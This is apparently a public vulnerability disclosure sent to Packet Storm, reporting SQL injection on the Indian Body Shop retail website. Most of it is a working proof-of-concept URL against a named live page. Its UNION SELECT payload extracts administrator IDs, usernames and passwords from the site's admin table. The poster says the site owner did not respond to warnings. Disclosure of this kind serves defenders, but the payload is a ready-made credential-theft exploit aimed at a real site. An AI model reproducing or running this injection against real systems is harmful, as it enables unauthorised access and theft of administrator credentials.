TheBodyShop.in suffers from a remote SQL injection vulnerability.
fcd54e0c4064a43957d71c70d17212c3da154e8aa338b3e7188e2125e3c7b391
Hi Packetstorm Team
Sql injection found at *The Body Shop* which is a global manufacturer and
retailer of naturally inspired, ethically produced beauty and cosmetics
products.
Please refer below for the POC :
http://www.thebodyshop.in/values_campaign.php?page=-1+UNION+SELECT+1,2,3,4,group_concat%28admin_id,0x3a,user_name,0x3a,password%29,6+from+admin--
website owner has been informed many times but no response .
Thanks
Arvind Kumar